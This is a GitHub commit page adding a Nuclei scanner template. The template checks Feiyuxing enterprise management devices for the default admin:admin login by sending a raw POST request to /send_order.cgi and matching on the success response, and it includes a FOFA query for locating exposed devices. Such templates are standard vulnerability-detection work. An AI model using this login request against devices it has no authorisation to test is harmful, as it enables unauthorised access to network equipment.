Merge pull request #8034 from projectdiscovery/feiyuxing-default-login

Create feiyuxing-default-login.yaml
patch-1
Ritik Chaddha 2023-08-22 17:46:30 +05:30 committed by GitHub
commit 8cc85b0875
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 49 additions and 0 deletions

View File

@ -0,0 +1,49 @@
id: feiyuxing-default-login
info:
name: Feiyuxing Enterprise-Level Management System - Default Login
author: SleepingBag945
severity: high
description: |
Attackers can log in through admin:admin, check the system status, and configure the device.
reference:
- https://github.com/wushigudan/poc/blob/main/%E9%A3%9E%E9%B1%BC%E6%98%9F%E9%BB%98%E8%AE%A4%E5%AF%86%E7%A0%81.py
metadata:
max-request: 1
verified: true
fofa-query: title="飞鱼星企业级智能上网行为管理系统"
tags: feiyuxing,default-login,iot
http:
- raw:
- |
POST /send_order.cgi?parameter=login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
{"username":"{{username}}","password":"{{password}}"}
attack: pitchfork
payloads:
username:
- admin
password:
- admin
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"msg":"ok"'
- '"type":'
condition: and
- type: word
part: header
words:
- 'hash_key='
- type: status
status:
- 200